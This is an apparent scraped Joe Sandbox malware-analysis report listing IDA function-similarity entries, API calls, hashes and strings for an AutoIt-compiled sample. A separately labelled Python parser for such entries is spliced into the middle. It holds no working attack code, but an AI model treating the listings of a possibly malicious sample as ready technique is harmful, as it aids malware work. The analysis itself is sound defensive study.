• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: b77bb5bc8eb8b0f92ea0bbaaf5e3b72652f8eb99c1a2262be71add1bdf33c7d9
• Instruction ID: 896b68d90e0731861d7a5b496f87ccb2702da0467931dd2c8d5cac7bde7fb4c4
• Opcode Fuzzy Hash: b77bb5bc8eb8b0f92ea0bbaaf5e3b72652f8eb99c1a2262be71add1bdf33c7d9
• Instruction Fuzzy Hash: 2C3103B1D4831A6ADB109FB68C8999FBFF8FF04750F50452AA50DE7280DA78A5418FA1
APIs
  • Part of subcall function 00EDE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00ECC8B7,?,00002000,?,?,00000000,?,00EC419E,?,?,?,00F5DC00), ref: 00EDE984
  • Part of subcall function 00EC660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC53B1,?,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC662F
• __wsplitpath.LIBCMT ref: 00ECC93E
  • Part of subcall function 00EE1DFC: __wsplitpath_helper.LIBCMT ref: 00EE1E3C
• _wcscpy.LIBCMT ref: 00ECC953
• _wcscat.LIBCMT ref: 00ECC968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ECC978
• SetCurrentDirectoryW.KERNEL32(?), ref: 00ECCABE
  • Part of subcall function 00ECB337: _wcscpy.LIBCMT ref: 00ECB36F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 2258743419-1018226102
• Opcode ID: 32602ec41c20131badc9710147d5ee2097611f7c61d9630cd0a8b054f1ecf177
• Instruction ID: 15bb71eac7cbbfe08f751bfae09b0a3e8720d6673a9abfd82b7f6db06711a303
• Opcode Fuzzy Hash: 32602ec41c20131badc9710147d5ee2097611f7c61d9630cd0a8b054f1ecf177
• Instruction Fuzzy Hash: 6312A1715083419FC724EF24C991EAFB7E4AF88314F14591EF48AA32A1DB31DA4ADB53
APIs
• _memset.LIBCMT ref: 00F2CEFB
• DestroyWindow.USER32(?,?), ref: 00F2CF73
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F2CFF4
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F2D016
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2D025
• DestroyWindow.USER32(?), ref: 00F2D042
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EC0000,00000000), ref: 00F2D075
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2D094
• GetDesktopWindow.USER32 ref: 00F2D0A9
• GetWindowRect.USER32(00000000), ref: 00F2D0B0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F2D0C2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F2D0DA
  • Part of subcall function 00EDB526: GetWindowLongW.USER32(?,000000EB), ref: 00EDB537
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
• String ID: 0$tooltips_class32
• API String ID: 3877571568-3619404913
• Opcode ID: 7ba569479bc96920c15c964a77b138984ac05849dc02dca53a4feb73b094dd8f
• Instruction ID: 449db8f7ee84943f19f3f8063f20f73174091fb162967a2087e7a372b116b6ec
• Opcode Fuzzy Hash: 7ba569479bc96920c15c964a77b138984ac05849dc02dca53a4feb73b094dd8f
• Instruction Fuzzy Hash: D071CA74540309AFE724CF28DC84FAA3BE9FB89714F04461DF985972A1D734E842EB22
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00F2F37A
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D7DE: ClientToScreen.USER32(?,?), ref: 00F2D807
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D7DE: GetWindowRect.USER32(?,?), ref: 00F2D87D
                                                                                                                                                                                                                                                        • Part of subcall function 00F2D7DE: PtInRect.USER32(?,?,00F2ED5A), ref: 00F2D88D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00F2F3E3
                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F2F3EE
                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F2F411
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F2F441
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F2F458
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00F2F471
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00F2F488
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00F2F4AA
                                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00F2F4B1
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F2F59C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: ec28ed3a8d6f112a23c42b73d485fd05d477b84ff6dc44e4fdea2f2787a4c58d
• Instruction ID: 6f392a8bbcd386ec2050694eb422b4dedfb6777737fa464de2f1668848c205b4
• Opcode Fuzzy Hash: ec28ed3a8d6f112a23c42b73d485fd05d477b84ff6dc44e4fdea2f2787a4c58d
• Instruction Fuzzy Hash: 4D615B71108304AFC301EF64DC45EABBBF8FF99710F104A2EF595A21A1DB719A0ADB52
APIs
• VariantInit.OLEAUT32(00000000), ref: 00F0AB3D
• VariantCopy.OLEAUT32(?,?), ref: 00F0AB46
• VariantClear.OLEAUT32(?), ref: 00F0AB52
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F0AC40
• __swprintf.LIBCMT ref: 00F0AC70
• VarR8FromDec.OLEAUT32(?,?), ref: 00F0AC9C
• VariantInit.OLEAUT32(?), ref: 00F0AD4D
• SysFreeString.OLEAUT32(00000016), ref: 00F0ADDF
• VariantClear.OLEAUT32(?), ref: 00F0AE35
• VariantClear.OLEAUT32(?), ref: 00F0AE44
• VariantInit.OLEAUT32(00000000), ref: 00F0AE80
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: 7383dfe6fc08c1d0e259d36d4b4fc162c9306f186d0f3b2ae06f0f6ad2f1e3e1
• Instruction ID: 2c4a8dfd91e1650c9e7f8804d0aff01cd3c89b71746b39abb644afbf84ae2e3e
• Opcode Fuzzy Hash: 7383dfe6fc08c1d0e259d36d4b4fc162c9306f186d0f3b2ae06f0f6ad2f1e3e1
• Instruction Fuzzy Hash: 5AD1CEB2A04205DBDB20DF65C885B6AB7F5FF45710F148056E405AB2D1DB78EC41FBA2
APIs
• CharUpperBuffW.USER32(?,?), ref: 00F271FC
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F27247
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: da0d0690b1f32b2c2fba933018258a188363dbcfe6b1e4b2fb428215ca23ccaa
• Instruction ID: 40ac2b749621d346822e8b3c06ee703e808edf6a9a480bda63db17cedf51fa42
• Opcode Fuzzy Hash: da0d0690b1f32b2c2fba933018258a188363dbcfe6b1e4b2fb428215ca23ccaa
• Instruction Fuzzy Hash: 9F914B302087559BCA04FF24D951A6EB7E1BF94310F10585DF9966B3A3DB31ED0AEB82
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F2E5AB
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F29808,?), ref: 00F2E607
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2E647
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2E68C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F2E6C3
• FreeLibrary.KERNEL32(?,00000004,?,?,?,00F29808,?), ref: 00F2E6CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F2E6DF
• DestroyIcon.USER32(?), ref: 00F2E6EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F2E70B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F2E717
  • Part of subcall function 00EE0FA7: __wcsicmp_l.LIBCMT ref: 00EE1030
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 83b1e1f1a6eae838a1e4abf62c860ca843cfa6c71244b6588ec7986dd902d2cc
• Instruction ID: 447a24db65fae4697c08e89ce6e20990ade7301a9141b2f85135ce14d5519d9d
• Opcode Fuzzy Hash: 83b1e1f1a6eae838a1e4abf62c860ca843cfa6c71244b6588ec7986dd902d2cc
• Instruction Fuzzy Hash: A061F371950229FAEB14DF64DC46FFE7BA8BB18720F204115F915E61D1EBB0E980EB60
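Added example, not part of the Joe Sandbox report or its tooling: a small Python parser that turns function-similarity entries like the ones above (the "APIs" call list, the "Memory Dump Source" offset and the "Similarity" ID fields) into records, so the call sites can be pivoted into the dump and the entries can be indexed by the API they call. The sample text is constructed by copying two entries from this page in the shape shown above; the line layout it assumes (bullet, `Api.MODULE(args), ref: ADDR`, indented `Part of subcall function` lines, `Key: Value` fields) is taken from these entries only, and the RVA helper assumes the dump's `Offset:` value is the base the `ref:` addresses are relative to.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two entries copied in the shape of the report above.
# The second one stops after its Memory Dump Source (as the page does),
# so it has no Similarity fields; the parser must cope with that.
SAMPLE = """\
APIs
• CharUpperBuffW.USER32(?,?), ref: 00F271FC
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F27247
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Instruction ID: 40ac2b749621d346822e8b3c06ee703e808edf6a9a480bda63db17cedf51fa42
• Instruction Fuzzy Hash: 9F914B302087559BCA04FF24D951A6EB7E1BF94310F10585DF9966B3A3DB31ED0AEB82
APIs
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
• CharLowerBuffW.USER32(?,?), ref: 00F0D292
• GetDriveTypeW.KERNEL32 ref: 00F0D2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D327
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
"""


@dataclass
class ApiCall:
    api: str                    # e.g. "SendMessageW"
    module: str                 # e.g. "USER32" (LIBCMT for statically linked CRT)
    args: List[str]             # arguments as printed; "?" means the sandbox could not resolve it
    ref: int                    # address of the call site inside the dump
    via_subcall: Optional[str]  # address of the callee when the call is made from a subcalled function


@dataclass
class Entry:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # "API ID", "Instruction ID", ...
    base: Optional[int] = None                            # "Offset:" of the Memory Dump Source

    @property
    def strings(self) -> List[str]:
        """The '$'-separated String ID field as a list (empty when the entry has none)."""
        sid = self.fields.get("String ID", "")
        return sid.split("$") if sid else []

    def rva(self, call: ApiCall) -> int:
        """Call-site offset relative to the dump base (assumption: ref addresses share that base)."""
        if self.base is None:
            raise ValueError("entry has no Memory Dump Source offset")
        return call.ref - self.base


# One call line: optional subcall prefix, Api.MODULE, optional (args), then ", ref: ADDR" or " ref: ADDR".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


def parse_entries(text: str) -> List[Entry]:
    """Split the report text at each 'APIs' header and parse the bullet lines that follow."""
    entries: List[Entry] = []
    cur: Optional[Entry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                      # section headers such as "Strings" or "Similarity"
        m = API_RE.match(line)            # try the call-line shape before the generic Key: Value shape
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur.apis.append(ApiCall(m.group("api"), m.group("mod"), args,
                                    int(m.group("ref"), 16), m.group("sub")))
            continue
        m = KV_RE.match(line)
        if m:
            key, val = m.group("key").strip(), m.group("val").strip()
            cur.fields[key] = val
            if key == "Source File":
                om = OFFSET_RE.search(val)
                if om:
                    cur.base = int(om.group(1), 16)
    return entries


def api_index(entries: List[Entry]) -> Dict[str, List[str]]:
    """Map "MODULE!Api" to the Instruction IDs of the functions calling it directly (subcalls excluded)."""
    idx: Dict[str, List[str]] = {}
    for e in entries:
        iid = e.fields.get("Instruction ID", "?")   # "?" when the entry has no Similarity block
        for c in e.apis:
            if c.via_subcall is None:
                idx.setdefault(f"{c.module}!{c.api}", []).append(iid)
    return idx


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.fields.get("Instruction ID", "<no Similarity block>"), "strings:", len(e.strings))
        for c in e.apis:
            print(f"  {c.module}!{c.api:<16} ref={c.ref:08X} rva={e.rva(c):06X} args={c.args}")
```

The RVA is what you need to find the call site in the downloaded `.sdmp` without a loader, and the index lets you ask which lifted functions touch a given import. The Opcode and Instruction ID fields and the two fuzzy hashes are carried through as opaque strings; this parser makes no claim about how Joe Sandbox computes them.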
APIs
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
• CharLowerBuffW.USER32(?,?), ref: 00F0D292
• GetDriveTypeW.KERNEL32 ref: 00F0D2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D327
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D35E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F0D38C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                      • API String ID: 1148790751-4113822522
                                                                                                                                                                                                                                                      • Opcode ID: 822231a65e0a667268bf694923385b2c509bb61b7c2f8e935696902e32737413
                                                                                                                                                                                                                                                      • Instruction ID: f686b3d5d9ab6eefe0550d7aa4977ce728fe85bfc200768f23ef43eaedc0acc3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 822231a65e0a667268bf694923385b2c509bb61b7c2f8e935696902e32737413
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0514A75504305AFC700EF14C982E6EB7E4EF98718F10986DF89967291DB31EE06EB42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00F33973,00000016,0000138C,00000016,?,00000016,00F5DDB4,00000000,?), ref: 00F026F1
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00F33973,00000016), ref: 00F026FA
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00F33973,00000016,0000138C,00000016,?,00000016,00F5DDB4,00000000,?,00000016), ref: 00F0271C
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00F33973,00000016), ref: 00F0271F
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0276F
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F02780
                                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00F02829
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F02840
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                      • API String ID: 618562835-2268648507
                                                                                                                                                                                                                                                      • Opcode ID: 5b817a2cc771bb4d919ecf3618ce804271351a5e3d1c459fe01a95f534cf77a0
                                                                                                                                                                                                                                                      • Instruction ID: 0f6f7c22f00105c83fb60c0b51fd76ee5d2a2dd78ea7128c641bf69b82c0b9c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b817a2cc771bb4d919ecf3618ce804271351a5e3d1c459fe01a95f534cf77a0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E41577280061CBACB14FBD0DE86EEEB7B8AF15340F145069F50572092DE756F4AEB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F0D0D8
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0D0FA
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F0D137
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F0D15C
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F0D17B
                                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00F0D1B7
                                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F0D1EC
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F0D1F7
                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00F0D200
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F0D20A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                                                                                                                                                      • Opcode ID: 224593826f7dc41e980f73b0ac203ceba8d86cc5c3685d80770c18625beb2d1b
                                                                                                                                                                                                                                                      • Instruction ID: e72e5a4f6e45a8b71b3920cd3527570e75f2f0f00fbdee40210608af9c05a844
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 224593826f7dc41e980f73b0ac203ceba8d86cc5c3685d80770c18625beb2d1b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8631A5B6900109ABDB21DFA1DC49FEB77BCEF89740F1040B6F909D21A1EB709744AB25
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 884005220-0
                                                                                                                                                                                                                                                      • Opcode ID: 6e83817fa596cbc45d3b903549d8878da3431a169466542dc8347f9f870a018b
                                                                                                                                                                                                                                                      • Instruction ID: 25ba1b7deea4a79ddac2b425f5d8ef4aeef40005a027674a7ebbfeed4229cf26
• Opcode Fuzzy Hash: 6e83817fa596cbc45d3b903549d8878da3431a169466542dc8347f9f870a018b
• Instruction Fuzzy Hash: B061113290064EAFDB25AF25DE427B977E4EF503B8FA02126EA44BB181DF74CD408791

APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F2E754
• GetFileSize.KERNEL32(00000000,00000000), ref: 00F2E76B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F2E776
• CloseHandle.KERNEL32(00000000), ref: 00F2E783
• GlobalLock.KERNEL32(00000000), ref: 00F2E78C
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F2E79B
• GlobalUnlock.KERNEL32(00000000), ref: 00F2E7A4
• CloseHandle.KERNEL32(00000000), ref: 00F2E7AB
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F2E7BC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00F4D9BC,?), ref: 00F2E7D5
• GlobalFree.KERNEL32(00000000), ref: 00F2E7E5
